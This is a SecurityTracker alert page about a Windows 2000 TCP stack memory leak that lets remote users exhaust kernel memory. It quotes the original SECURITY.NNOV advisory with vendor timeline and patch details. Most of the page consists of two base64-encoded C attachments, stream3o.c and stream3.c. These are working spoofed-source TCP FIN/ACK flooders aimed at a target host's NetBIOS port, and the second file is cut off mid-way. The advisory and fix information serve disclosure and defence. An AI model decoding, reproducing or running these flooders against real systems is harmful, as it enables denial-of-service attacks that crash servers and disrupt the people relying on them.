SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Microsoft)  >   Windows TCP/IP Stack Vendors:   Microsoft
Windows 2000 TCP Stack Bug Lets Remote Users Cause All Memory to Be Consumed on the Server
SecurityTracker Alert ID:  1003382
SecurityTracker URL:  http://securitytracker.com/id/1003382
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 28 2002
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   Security.NNOV reported a denial of service vulnerability in Microsoft Windows 2000. A remote user can cause the server to consume all available memory.

It is reported that there is a memory leak in the TCP stack in Windows 2000. A remote user can send certain TCP packets, such as empty TCP packets with the ACK and FIN flags set, to cause memory to leak from non-paged kernel space.

A demonstration exploit is available (see the Base64-encoded attachment in the Source Message).

Impact:   A remote user can cause the server to consume all available memory and crash.
Solution:   The vendor released a solution last year. The solution is available in Windows 2000 SP2. Apply Service Pack 2 (SP2), available at:

http://www.microsoft.com/windows2000/downloads/servicepacks/sp2/

Vendor URL:  support.microsoft.com/default.aspx?scid=kb;en-us;Q280446 (Links to External Site)
Cause:   Resource error
Underlying OS:  Windows (2000)
Underlying OS Comments:  Windows 2000 and 2000 SP1

Message History:   None.


 Source Message Contents

Subject:  SECURITY.NNOV: stream3 Windows NT/2000 DoS (Q280446)


------------A75016D2F7EDAB0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Dear,

Some  of  you  may  be interested in information about Microsoft Q280446
issue  (patch  included  into  SP2). Just to throw the light on it we've
decided    to    publish    information   because Microsoft declared the
deadline for official Windows NT 4.0 support.

Topic:                    Windows NT/2000 DoS via stream3 flood attack
Authors:                  Dark Zorro <darkz@pisem.net>,
                          Error <error@pochtamt.ru>
Date:                     2 December 2000 (yes... it's old)
Vendor Informed:          2 December 2000
Software affected:        Microsoft Windows NT 4.0, Windows 2000
Risk:                     Low/Average
Remote:                   Yes
Exploitable:              Yes
SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories

Description:

Stream  3 is flood attack of absolutely identical empty TCP packets with
ACK  and  FIN  flags.  Dark  Zoro and Error discovered unpatched Windows
leaks  the  memory  from  non-paged  kernel space during stream 3 attack
against  NetBIOS  (TCP/139)  port. This memory never released back after
attack.  Since  this attack doesn't require TCP connection it may bypass
purely  configured  packet  filters.  Effectivity  of  attack depends on
amount  of  RAM  installed  in  target  host,  routing  schema  and link
bandwidth between source and target (xDSL/10BaseT is ideal). Results may
vary from missing 2-3 Mb of non-paged memory to blue screen.

I've  got few unverified reports of successful usage of stream 3 against
different ports and different systems.

Vendor:

Microsoft was contacted on December, 2 2000. On December, 15 private fix
Q280446  for  Windows  2000  was released. It was made public few months
later and was included into Service Pack 2.

Microsoft failed to reproduce and fix problem under Windows NT 4.0

Solution/Fix:

For  Windows  2000  apply  SP2.  Make  sure  you  filter  all traffic to
privileged ports

Exploitation:

Try  stream3.c  it  should  be more faster and compatible. stream3o.c is
variant of old stream.c. It compiles and works under i386 FreeBSD.


-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)
------------A75016D2F7EDAB0
Content-Type: application/octet-stream; name="stream3o.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="stream3o.c"

LyoKIHN0cmVhbTMuYyAtIFRDUCBGSU4gcGFja2V0IGZsb29kZXIKIHBhdGNoZWQgZnJvbSBzdHJl
YW0uYyBieSAzQVBBM0EsIDIwMDAKIDNBUEEzQUBzZWN1cml0eS5ubm92LnJ1CiovCiNpbmNsdWRl
IDxzdGRpby5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1
ZGUgPHN0cmluZ3MuaD4KI2luY2x1ZGUgPHN5cy90aW1lLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMu
aD4KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4KI2lmbmRlZiBfX1VTRV9CU0QKI2RlZmluZSBfX1VT
RV9CU0QKI2VuZGlmCiNpZm5kZWYgX19GQVZPUl9CU0QKI2RlZmluZSBfX0ZBVk9SX0JTRAojZW5k
aWYKI2luY2x1ZGUgPG5ldGluZXQvaW5fc3lzdG0uaD4KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4K
I2luY2x1ZGUgPG5ldGluZXQvaXAuaD4KI2luY2x1ZGUgPG5ldGluZXQvdGNwLmg+CiNpbmNsdWRl
IDxhcnBhL2luZXQuaD4KI2luY2x1ZGUgPG5ldGRiLmg+CgojaWZkZWYgTElOVVgKI2RlZmluZSBG
SVgoeCkgIGh0b25zKHgpCiNlbHNlCiNkZWZpbmUgRklYKHgpICAoeCkKI2VuZGlmCgpzdHJ1Y3Qg
aXBfaGRyIHsKICAgIHVfaW50ICAgICAgIGlwX2hsOjQsICAgICAgICAgICAgICAgIC8qIGhlYWRl
ciBsZW5ndGggaW4gMzIgYml0IHdvcmRzICovCiAgICAgICAgICAgICAgICBpcF92OjQ7ICAgICAg
ICAgICAgICAgICAvKiBpcCB2ZXJzaW9uICovCiAgICB1X2NoYXIgICAgICBpcF90b3M7ICAgICAg
ICAgICAgICAgICAvKiB0eXBlIG9mIHNlcnZpY2UgKi8KICAgIHVfc2hvcnQgICAgIGlwX2xlbjsg
ICAgICAgICAgICAgICAgIC8qIHRvdGFsIHBhY2tldCBsZW5ndGggKi8KICAgIHVfc2hvcnQgICAg
IGlwX2lkOyAgICAgICAgICAgICAgICAgIC8qIGlkZW50aWZpY2F0aW9uICovCiAgICB1X3Nob3J0
ICAgICBpcF9vZmY7ICAgICAgICAgICAgICAgICAvKiBmcmFnbWVudCBvZmZzZXQgKi8KICAgIHVf
Y2hhciAgICAgIGlwX3R0bDsgICAgICAgICAgICAgICAgIC8qIHRpbWUgdG8gbGl2ZSAqLwogICAg
dV9jaGFyICAgICAgaXBfcDsgICAgICAgICAgICAgICAgICAgLyogcHJvdG9jb2wgKi8KICAgIHVf
c2hvcnQgICAgIGlwX3N1bTsgICAgICAgICAgICAgICAgIC8qIGlwIGNoZWNrc3VtICovCiAgICB1
X2xvbmcgICAgICBzYWRkciwgZGFkZHI7ICAgICAgICAgICAvKiBzb3VyY2UgYW5kIGRlc3QgYWRk
cmVzcyAqLwp9OwoKc3RydWN0IHRjcF9oZHIgewogICAgdV9zaG9ydCAgICAgdGhfc3BvcnQ7ICAg
ICAgICAgICAgICAgLyogc291cmNlIHBvcnQgKi8KICAgIHVfc2hvcnQgICAgIHRoX2Rwb3J0OyAg
ICAgICAgICAgICAgIC8qIGRlc3RpbmF0aW9uIHBvcnQgKi8KICAgIHVfbG9uZyAgICAgIHRoX3Nl
cTsgICAgICAgICAgICAgICAgIC8qIHNlcXVlbmNlIG51bWJlciAqLwogICAgdV9sb25nICAgICAg
dGhfYWNrOyAgICAgICAgICAgICAgICAgLyogYWNrbm93bGVkZ2VtZW50IG51bWJlciAqLwogICAg
dV9pbnQgICAgICAgdGhfeDI6NCwgICAgICAgICAgICAgICAgLyogdW51c2VkICovCiAgICAgICAg
ICAgICAgICB0aF9vZmY6NDsgICAgICAgICAgICAgICAvKiBkYXRhIG9mZnNldCAqLwogICAgdV9j
aGFyICAgICAgdGhfZmxhZ3M7ICAgICAgICAgICAgICAgLyogZmxhZ3MgZmllbGQgKi8KICAgIHVf
c2hvcnQgICAgIHRoX3dpbjsgICAgICAgICAgICAgICAgIC8qIHdpbmRvdyBzaXplICovCiAgICB1
X3Nob3J0ICAgICB0aF9zdW07ICAgICAgICAgICAgICAgICAvKiB0Y3AgY2hlY2tzdW0gKi8KICAg
IHVfc2hvcnQgICAgIHRoX3VycDsgICAgICAgICAgICAgICAgIC8qIHVyZ2VudCBwb2ludGVyICov
Cn07CgpzdHJ1Y3QgdGNwb3B0X2hkciB7CiAgICB1X2NoYXIgIHR5cGU7ICAgICAgICAgICAgICAg
ICAgICAgICAvKiB0eXBlICovCiAgICB1X2NoYXIgIGxlbjsgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgIC8qIGxlbmd0aCAqLwogICAgdV9zaG9ydCB2YWx1ZTsgICAgICAgICAgICAgICAg
ICAgICAgLyogdmFsdWUgKi8KfTsKCnN0cnVjdCBwc2V1ZG9faGRyIHsgICAgICAgICAgICAgICAg
ICAgICAvKiBTZWUgUkZDIDc5MyBQc2V1ZG8gSGVhZGVyICovCiAgICB1X2xvbmcgc2FkZHIsIGRh
ZGRyOyAgICAgICAgICAgICAgICAgICAgICAgIC8qIHNvdXJjZSBhbmQgZGVzdCBhZGRyZXNzICov
CiAgICB1X2NoYXIgbWJ6LCBwdGNsOyAgICAgICAgICAgICAgICAgICAvKiB6ZXJvIGFuZCBwcm90
b2NvbCAqLwogICAgdV9zaG9ydCB0Y3BsOyAgICAgICAgICAgICAgICAgICAgICAgLyogdGNwIGxl
bmd0aCAqLwp9OwoKc3RydWN0IHBhY2tldCB7CiAgICBzdHJ1Y3QgaXAvKl9oZHIqLyBpcDsKICAg
IHN0cnVjdCB0Y3BoZHIgdGNwOwovKiBzdHJ1Y3QgdGNwb3B0X2hkciBvcHQ7ICovCn07CgpzdHJ1
Y3QgY2tzdW0gewogICAgc3RydWN0IHBzZXVkb19oZHIgcHNldWRvOwogICAgc3RydWN0IHRjcGhk
ciB0Y3A7Cn07CgpzdHJ1Y3QgcGFja2V0IHBhY2tldDsKc3RydWN0IGNrc3VtIGNrc3VtOwpzdHJ1
Y3Qgc29ja2FkZHJfaW4gc19pbjsKdV9zaG9ydCBkc3Rwb3J0LCBwa3RzaXplLCBwcHM7CnVfbG9u
ZyBkc3RhZGRyOwppbnQgc29jazsKCnZvaWQgdXNhZ2UoY2hhciAqcHJvZ25hbWUpCnsKICAgIGZw
cmludGYoc3RkZXJyLCAiVXNhZ2U6ICVzIDxkc3RhZGRyPiA8ZHN0cG9ydD4gPHBrdHNpemU+IDxw
cHM+XG4iLCAKcHJvZ25hbWUpOwogICAgZnByaW50ZihzdGRlcnIsICIgICAgZHN0YWRkciAgLSB0
aGUgdGFyZ2V0IHdlIGFyZSB0cnlpbmcgdG8gYXR0YWNrLlxuIik7CiAgICBmcHJpbnRmKHN0ZGVy
ciwgIiAgICBkc3Rwb3J0ICAtIHRoZSBwb3J0IG9mIHRoZSB0YXJnZXQsIDAgPSByYW5kb20uXG4i
KTsKICAgIGZwcmludGYoc3RkZXJyLCAiICAgIHBrdHNpemUgIC0gdGhlIGV4dHJhIHNpemUgdG8g
dXNlLiAgMCA9IG5vcm1hbCAKc3luLlxuIik7CiAgICBleGl0KDEpOwp9CgovKiBUaGlzIGlzIGEg
cmVmZXJlbmNlIGludGVybmV0IGNoZWNrc3VtIGltcGxpbWVudGF0aW9uLCBub3QgdmVyeSBmYXN0
ICovCmlubGluZSB1X3Nob3J0IGluX2Nrc3VtKHVfc2hvcnQgKmFkZHIsIGludCBsZW4pCnsKICAg
IHJlZ2lzdGVyIGludCBubGVmdCA9IGxlbjsKICAgIHJlZ2lzdGVyIHVfc2hvcnQgKncgPSBhZGRy
OwogICAgcmVnaXN0ZXIgaW50IHN1bSA9IDA7CiAgICB1X3Nob3J0IGFuc3dlciA9IDA7CgogICAg
IC8qIE91ciBhbGdvcml0aG0gaXMgc2ltcGxlLCB1c2luZyBhIDMyIGJpdCBhY2N1bXVsYXRvciAo
c3VtKSwgd2UgYWRkCiAgICAgICogc2VxdWVudGlhbCAxNiBiaXQgd29yZHMgdG8gaXQsIGFuZCBh
dCB0aGUgZW5kLCBmb2xkIGJhY2sgYWxsIHRoZQogICAgICAqIGNhcnJ5IGJpdHMgZnJvbSB0aGUg
dG9wIDE2IGJpdHMgaW50byB0aGUgbG93ZXIgMTYgYml0cy4gKi8KCiAgICAgd2hpbGUgKG5sZWZ0
ID4gMSkgIHsKICAgICAgICAgc3VtICs9ICp3Kys7CiAgICAgICAgIG5sZWZ0IC09IDI7CiAgICAg
fQoKICAgICAvKiBtb3AgdXAgYW4gb2RkIGJ5dGUsIGlmIG5lY2Vzc2FyeSAqLwogICAgIGlmIChu
bGVmdCA9PSAxKSB7CiAgICAgICAgICoodV9jaGFyICopKCZhbnN3ZXIpID0gKih1X2NoYXIgKikg
dzsKICAgICAgICAgc3VtICs9IGFuc3dlcjsKICAgICB9CgogICAgIC8qIGFkZCBiYWNrIGNhcnJ5
IG91dHMgZnJvbSB0b3AgMTYgYml0cyB0byBsb3cgMTYgYml0cyAqLwogICAgIHN1bSA9IChzdW0g
Pj4gMTYpICsgKHN1bSAmIDB4ZmZmZik7IC8qIGFkZCBoaSAxNiB0byBsb3cgMTYgKi8KICAgICBz
dW0gKz0gKHN1bSA+PiAxNik7ICAgICAgICAgICAgICAgIC8qIGFkZCBjYXJyeSAqLwogICAgIGFu
c3dlciA9IH5zdW07ICAgICAgICAgICAgICAgICAgICAgLyogdHJ1bmNhdGUgdG8gMTYgYml0cyAq
LwogICAgIHJldHVybihhbnN3ZXIpOwp9Cgp1X2xvbmcgbG9va3VwKGNoYXIgKmhvc3RuYW1lKQp7
CiAgICBzdHJ1Y3QgaG9zdGVudCAqaHA7CgogICAgaWYgKChocCA9IGdldGhvc3RieW5hbWUoaG9z
dG5hbWUpKSA9PSBOVUxMKSB7CiAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkNvdWxkIG5vdCByZXNv
bHZlICVzLlxuIiwgaG9zdG5hbWUpOwogICAgICAgZXhpdCgxKTsKICAgIH0KCiAgICByZXR1cm4g
Kih1X2xvbmcgKilocC0+aF9hZGRyOwp9CgoKdm9pZCBmbG9vZGVyKHZvaWQpCnsKICAgIHN0cnVj
dCB0aW1lc3BlYyB0czsKICAgIGludCBpOwoKCiAgICBtZW1zZXQoJnBhY2tldCwgMCwgc2l6ZW9m
KHBhY2tldCkpOwoKICAgIHRzLnR2X3NlYyAgICAgICAgICAgICAgICAgICA9IDA7CiAgICB0cy50
dl9uc2VjICAgICAgICAgICAgICAgICAgPSAxMDsKCiAgICBwYWNrZXQuaXAuaXBfaGwgICAgICAg
ICAgICAgPSA1OwogICAgcGFja2V0LmlwLmlwX3YgICAgICAgICAgICAgID0gNDsKICAgIHBhY2tl
dC5pcC5pcF9wICAgICAgICAgICAgICA9IElQUFJPVE9fVENQOwogICAgcGFja2V0LmlwLmlwX3Rv
cyAgICAgICAgICAgID0gMHgwODsKICAgIHBhY2tldC5pcC5pcF9pZCAgICAgICAgICAgICA9IHJh
bmQoKTsKICAgIHBhY2tldC5pcC5pcF9sZW4gICAgICAgICAgICA9IEZJWChzaXplb2YocGFja2V0
KSk7CiAgICBwYWNrZXQuaXAuaXBfb2ZmICAgICAgICAgICAgPSAwOyAvKiBJUF9ERj8gKi8KICAg
IHBhY2tldC5pcC5pcF90dGwgICAgICAgICAgICA9IDI1NTsKICAgIHBhY2tldC5pcC5pcF9kc3Qu
c19hZGRyICAgICA9IGRzdGFkZHI7CiAgICBwYWNrZXQuaXAuaXBfc3JjLnNfYWRkciAgICAgPSBy
YW5kb20oKTsKICAgIHBhY2tldC5pcC5pcF9zdW0gICAgICAgICAJPSAwOwogICAgcGFja2V0LnRj
cC50aF9zdW0gICAgICAgICAgID0gMDsKCiAgICBwYWNrZXQudGNwLnRoX3dpbiAgICAgICAgICAg
PSBodG9ucygxNjM4NCk7CiAgICBwYWNrZXQudGNwLnRoX3NlcSAgICAgICAgICAgPSByYW5kb20o
KTsKICAgIHBhY2tldC50Y3AudGhfYWNrICAgICAgICAgICA9IDA7CiAgICBwYWNrZXQudGNwLnRo
X29mZiAgICAgICAgICAgPSA1OyAvKiA1ICovCiAgICBwYWNrZXQudGNwLnRoX3VycCAgICAgICAg
ICAgPSAwOwogICAgcGFja2V0LnRjcC50aF9hY2sgCQk9IHJhbmQoKTsKICAgIHBhY2tldC50Y3Au
dGhfZmxhZ3MgCT0gVEhfQUNLfFRIX0ZJTjsKICAgIHBhY2tldC50Y3AudGhfc3BvcnQgCT0gcmFu
ZCgpOwogICAgcGFja2V0LnRjcC50aF9kcG9ydCAgICAgICAgID0gZHN0cG9ydD9odG9ucyhkc3Rw
b3J0KTpyYW5kKCk7CgovKgogICAgcGFja2V0Lm9wdC50eXBlICAgICAgICAgICAgID0gMHgwMjsK
ICAgIHBhY2tldC5vcHQubGVuICAgICAgICAgICAgICA9IDB4MDQ7CiAgICBwYWNrZXQub3B0LnZh
bHVlICAgICAgICAgICAgPSBodG9ucygxNDYwKTsKKi8KCgogICAgc19pbi5zaW5fZmFtaWx5ICAg
ICAgICAgICAgID0gQUZfSU5FVDsKICAgIHNfaW4uc2luX3BvcnQgICAgICAgICAgICAgICA9IHBh
Y2tldC50Y3AudGhfZHBvcnQ7CiAgICBzX2luLnNpbl9hZGRyLnNfYWRkcgk9IGRzdGFkZHI7Cgog
ICAgY2tzdW0ucHNldWRvLmRhZGRyICAgICAgICAgID0gZHN0YWRkcjsKICAgIGNrc3VtLnBzZXVk
by5zYWRkcgkJPSBwYWNrZXQuaXAuaXBfc3JjLnNfYWRkcjsKICAgIGNrc3VtLnBzZXVkby5tYnog
ICAgICAgICAgICA9IDA7CiAgICBja3N1bS5wc2V1ZG8ucHRjbCAgICAgICAgICAgPSBJUFBST1RP
X1RDUDsKICAgIGNrc3VtLnBzZXVkby50Y3BsICAgICAgICAgICA9IGh0b25zKHNpemVvZihzdHJ1
Y3QgdGNwaGRyKSk7CiAgICBja3N1bS50Y3AgICAgICAgICAgICAgICAgICAgPSBwYWNrZXQudGNw
OwoKICAgIHBhY2tldC5pcC5pcF9zdW0gICAgICAgICAgICA9IGluX2Nrc3VtKCh2b2lkICopJnBh
Y2tldC5pcCwgMjApOwogICAgcGFja2V0LnRjcC50aF9zdW0gICAgICAgICAgID0gaW5fY2tzdW0o
KHZvaWQgKikmY2tzdW0sIHNpemVvZihja3N1bSkpOwoKCiAgICBmb3IoaT0wOzsrK2kpIHsKCgog
ICAgICAgaWYgKHNlbmR0byhzb2NrLCAmcGFja2V0LCBzaXplb2YocGFja2V0KSwgMCwgKHN0cnVj
dCBzb2NrYWRkciAKKikmc19pbiwgc2l6ZW9mKHNfaW4pKSA8IDApCiAgICAgICAgICBwZXJyb3Io
Implc3MiKTsKCiAgICB9Cn0KCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pCnsKICAg
IGludCBvbiA9IDE7CgogICAgcHJpbnRmKCJzdHJlYW0zLmMgdjAuMDEgLSBUQ1AgRklOIFBhY2tl
dCBGbG9vZGVyXG4gbW9kaWZpZWQgYnkgM0FQQTNBQHNlY3VyaXR5Lm5ub3YucnVcbiIpOwoKICAg
IGlmICgoc29jayA9IHNvY2tldChQRl9JTkVULCBTT0NLX1JBVywgSVBQUk9UT19SQVcpKSA8IDAp
IHsKICAgICAgIHBlcnJvcigic29ja2V0Iik7CiAgICAgICBleGl0KDEpOwogICAgfQoKICAgIHNl
dGdpZChnZXRnaWQoKSk7IHNldHVpZChnZXR1aWQoKSk7CgogICAgaWYgKGFyZ2MgPCA0KQogICAg
ICAgdXNhZ2UoYXJndlswXSk7CgogICAgaWYgKHNldHNvY2tvcHQoc29jaywgSVBQUk9UT19JUCwg
SVBfSERSSU5DTCwgKGNoYXIgKikmb24sIHNpemVvZihvbikpIDwgIDApIHsKICAgICAgIHBlcnJv
cigic2V0c29ja29wdCIpOwogICAgICAgZXhpdCgxKTsKICAgIH0KCiAgICBzcmFuZCgodGltZShO
VUxMKSBeIGdldHBpZCgpKSArIGdldHBwaWQoKSk7CgogICAgcHJpbnRmKCJcblJlc29sdmluZyBJ
UHMuLi4iKTsgZmZsdXNoKHN0ZG91dCk7CgogICAgZHN0YWRkciAgICAgPSBsb29rdXAoYXJndlsx
XSk7CiAgICBkc3Rwb3J0ICAgICA9IGF0b2koYXJndlsyXSk7CiAgICBwa3RzaXplICAgICA9IGF0
b2koYXJndlszXSk7CgogICAgcHJpbnRmKCJTZW5kaW5nLi4uIik7IGZmbHVzaChzdGRvdXQpOwoK
ICAgIGZsb29kZXIoKTsKCiAgICByZXR1cm4gMDsKfQo=

------------A75016D2F7EDAB0
Content-Type: application/octet-stream; name="stream3.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="stream3.c"

LyogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKIHN0cmVhbTMuYyAtIEZJTi9B
Q0sgZmxvb2RlcgogVGVzdGVkIHRvIGNvbXBpbGUgYW5kIHdvcmsgdW5kZXIgRnJlZUJTRAogKGMp
IGJ5IDNBUEEzQSBAIFNFQ1VSSVRZLk5OT1YsIDIwMDAKIDNBUEEzQUBzZWN1cml0eS5ubm92LnJ1
CiBodHRwOi8vd3d3LnNlY3VyaXR5Lm5ub3YucnUKIFRoYW54IHRvIERhcmtab3JybyAmIEVycm9y
IGZvciBkaXNjb3ZlcmluZyB0aGlzIHByb2JsZW0KIEdyZWV0eiB0byB2b2lkLnJ1LiBHZXQgYmV0
dGVyLCBEdWtlIQoqLwoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2lu
Y2x1ZGUgPGN0eXBlLmg+CiNpbmNsdWRlIDxzdHJpbmdzLmg+CiNpbmNsdWRlIDxzeXMvdGltZS5o
PgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+CgoKI2luY2x1
ZGUgPG5ldGluZXQvaW4uaD4KI2luY2x1ZGUgPG5ldGRiLmg+CgojaWZkZWYgTElOVVgKI2RlZmlu
ZSBGSVgoeCkgIGh0b25zKHgpCiNlbHNlCiNkZWZpbmUgRklYKHgpICAoeCkKI2VuZGlmCgojZGVm
aW5lCVRIX0ZJTgkweDAxCiNkZWZpbmUJVEhfU1lOCTB4MDIKI2RlZmluZQlUSF9SU1QJMHgwNAoj
ZGVmaW5lCVRIX1BVU0gJMHgwOAojZGVmaW5lCVRIX0FDSwkweDEwCiNkZWZpbmUJVEhfVVJHCTB4
MjAKCgpzdHJ1Y3QgaXBfaGRyIHsKICAgIHVfaW50ICAgICAgIGlwX2hsOjQsICAgICAgICAgICAg
ICAgIC8qIGhlYWRlciBsZW5ndGggaW4gMzIgYml0IHdvcmRzICovCiAgICAgICAgICAgICAgICBp
cF92OjQ7ICAgICAgICAgICAgICAgICAvKiBpcCB2ZXJzaW9uICovCiAgICB1X2NoYXIgICAgICBp
cF90b3M7ICAgICAgICAgICAgICAgICAvKiB0eXBlIG9mIHNlcnZpY2UgKi8KICAgIHVfc2hvcnQg
ICAgIGlwX2xlbjsgICAgICAgICAgICAgICAgIC8qIHRvdGFsIHBhY2tldCBsZW5ndGggKi8KICAg
IHVfc2hvcnQgICAgIGlwX2lkOyAgICAgICAgICAgICAgICAgIC8qIGlkZW50aWZpY2F0aW9uICov
CiAgICB1X3Nob3J0ICAgICBpcF9vZmY7ICAgICAgICAgICAgICAgICAvKiBmcmFnbWVudCBvZmZz
ZXQgKi8KICAgIHVfY2hhciAgICAgIGlwX3R0bDsgICAgICAgICAgICAgICAgIC8qIHRpbWUgdG8g
bGl2ZSAqLwogICAgdV9jaGFyICAgICAgaXBfcDsgICAgICAgICAgICAgICAgICAgLyogcHJvdG9j
b2wgKi8KICAgIHVfc2hvcnQgICAgIGlwX3N1bTsgICAgICAgICAgICAgICAgIC8qIGlwIGNoZWNr
c3VtICovCiAgICB1X2xvbmcgICAgICBpcF9zcmMsIGlwX2RzdDsgICAgICAgICAgIC8qIHNvdXJj
ZSBhbmQgZGVzdCBhZGRyZXNzICovCn07CgpzdHJ1Y3QgdGNwX2hkciB7CiAgICB1X3Nob3J0ICAg
ICB0aF9zcG9ydDsgICAgICAgICAgICAgICAvKiBzb3VyY2UgcG9ydCAqLwogICAgdV9zaG9ydCAg
ICAgdGhfZHBvcnQ7ICAgICAgICAgICAgICAgLyogZGVzdGluYXRpb24gcG9ydCAqLwogICAgdV9s
b25nICAgICAgdGhfc2VxOyAgICAgICAgICAgICAgICAgLyogc2VxdWVuY2UgbnVtYmVyICovCiAg
ICB1X2xvbmcgICAgICB0aF9hY2s7ICAgICAgICAgICAgICAgICAvKiBhY2tub3dsZWRnZW1lbnQg
bnVtYmVyICovCiAgICB1X2ludCAgICAgICB0aF94Mjo0LCAgICAgICAgICAgICAgICAvKiB1bnVz
ZWQgKi8KICAgICAgICAgICAgICAgIHRoX29mZjo0OyAgICAgICAgICAgICAgIC8qIGRhdGEgb2Zm
c2V0ICovCiAgICB1X2NoYXIgICAgICB0aF9mbGFnczsgICAgICAgICAgICAgICAvKiBmbGFncyBm
aWVsZCAqLwogICAgdV9zaG9ydCAgICAgdGhfd2luOyAgICAgICAgICAgICAgICAgLyogd2luZG93
IHNpemUgKi8KICAgIHVfc2hvcnQgICAgIHRoX3N1bTsgICAgICAgICAgICAgICAgIC8qIHRjcCBj
aGVja3N1bSAqLwogICAgdV9zaG9ydCAgICAgdGhfdXJwOyAgICAgICAgICAgICAgICAgLyogdXJn
ZW50IHBvaW50ZXIgKi8KfTsKCgpzdHJ1Y3QgcHNldWRvX2hkciB7ICAgICAgICAgICAgICAgICAg
ICAgLyogU2VlIFJGQyA3OTMgUHNldWRvIEhlYWRlciAqLwogICAgdV9sb25nIHNhZGRyLCBkYWRk
cjsgICAgICAgICAgICAgICAgLyogc291cmNlIGFuZCBkZXN0IGFkZHJlc3MgKi8KICAgIHVfY2hh
ciBtYnosIHB0Y2w7ICAgICAgICAgICAgICAgICAgIC8qIHplcm8gYW5kIHByb3RvY29sICovCiAg
ICB1X3Nob3J0IHRjcGw7ICAgICAgICAgICAgICAgICAgICAgICAvKiB0Y3AgbGVuZ3RoICovCn07
CgpzdHJ1Y3QgcGFja2V0IHsKICAgIHN0cnVjdCBpcF9oZHIgaXA7CiAgICBzdHJ1Y3QgdGNwX2hk
ciB0Y3A7Cn07CgpzdHJ1Y3QgY2tzdW0gewogICAgc3RydWN0IHBzZXVkb19oZHIgcHNldWRvOwog
ICAgc3RydWN0IHRjcF9oZHIgdGNwOwp9OwoKCgp1X3Nob3J0IGRzdHBvcnQ9MTM5LCBzcmNwb3J0
PTA7CnVfbG9uZyBkc3RhZGRyLCBzcmNhZGRyPTA7CmludCBzb2NrOwoKdm9pZCB1c2FnZShjaGFy
ICpwcm9nbmFtZSkKewogICAgZnByaW50ZihzdGRlcnIsIAogICAgICJVc2FnZTogJXMgPGRzdGFk
ZHI+IDxkc3Rwb3J0PiA8c3JjYWRkcj4gPHNyY3BvcnQ+XG4iCiAgICAgIiAgICBkc3RhZGRyICAg
ICAtIHRoZSB0YXJnZXQgd2UgYXJlIHRyeWluZyB0byBhdHRhY2suXG4iCiAgICAgIiAgICBkc3Rw
b3J0ICAgICAtIFRDUCBwb3J0ICgxMzkgZGVmYXVsdCkuXG4iCiAgICAgIiAgICBzcmNhZGRyICAg
ICAtIHNwb29mZWQgc291cmNlIGFkZHJlc3MgKHJhbmRvbSBkZWZhdWx0KVxuIgogICAgICIgICAg
c3JjcG9ydCAgICAgLSBzcG9vZmVkIHNvdXJjZSBUQ1AgcG9ydCAocmFuZG9tIGRlZmF1bHQpXG4i
LAogICAgcHJvZ25hbWUpOwogICAgZXhpdCgxKTsKfQoKCgovKiBUaGlzIGlzIGEgcmVmZXJlbmNl
IGludGVybmV0IGNoZWNrc3VtIGltcGxpbWVudGF0aW9uLCBub3QgdmVyeSBmYXN0ICovCmlubGlu
ZSB1X3Nob3J0IGluX2Nrc3VtKHVfc2hvcnQgKmFkZHIsIGludCBsZW4pCnsKICAgIHJlZ2lzdGVy
IGludCBubGVmdCA9IGxlbjsKICAgIHJlZ2lzdGVyIHVfc2hvcnQgKncgPSBhZGRyOwogICAgcmVn
aXN0ZXIgaW50IHN1bSA9IDA7CiAgICB1X3Nob3J0IGFuc3dlciA9IDA7CgogICAgIC8qIE91ciBh
bGdvcml0aG0gaXMgc2ltcGxlLCB1c2luZyBhIDMyIGJpdCBhY2N1bXVsYXRvciAoc3VtKSwgd2Ug
YWRkCiAgICAgICogc2VxdWVudGlhbCAxNiBiaXQgd29yZHMgdG8gaXQsIGFuZCBhdCB0aGUgZW5k
LCBmb2xkIGJhY2sgYWxsIHRoZQogICAgICAqIGNhcnJ5IGJpdHMgZnJvbSB0aGUgdG9wIDE2IGJp
dHMgaW50byB0aGUgbG93ZXIgMTYgYml0cy4gKi8KCiAgICAgd2hpbGUgKG5sZWZ0ID4gMSkgIHsK
ICAgICAgICAgc3VtICs9ICp3Kys7CiAgICAgICAgIG5sZWZ0IC09IDI7CiAgICAgfQoKICAgICAv
KiBtb3AgdXAgYW4gb2RkIGJ5dGUsIGlmIG5lY2Vzc2FyeSAqLwogICAgIGlmIChubGVmdCA9PSAx
KSB7CiAgICAgICAgICoodV9jaGFyICopKCZhbnN3ZXIpID0gKih1X2NoYXIgKikgdzsKICAgICAg
ICAgc3VtICs9IGFuc3dlcjsKICAgICB9CgogICAgIC8qIGFkZCBiYWNrIGNhcnJ5IG91dHMgZnJv
bSB0b3AgMTYgYml0cyB0byBsb3cgMTYgYml0cyAqLwogICAgIHN1bSA9IChzdW0gPj4gMTYpICsg
KHN1bSAmIDB4ZmZmZik7IC8qIGFkZCBoaSAxNiB0byBsb3cgMTYgKi8KICAgICBzdW0gKz0gKHN1
bSA+PiAxNik7ICAgICAgICAgICAgICAgIC8qIGFkZCBjYXJyeSAqLwogICAgIGFuc3dlciA9IH5z
dW07ICAgICAgICAgICAgICAgICAgICAgLyogdHJ1bmNhdGUgdG8gMTYgYml0cyAqLwogICAgIHJl
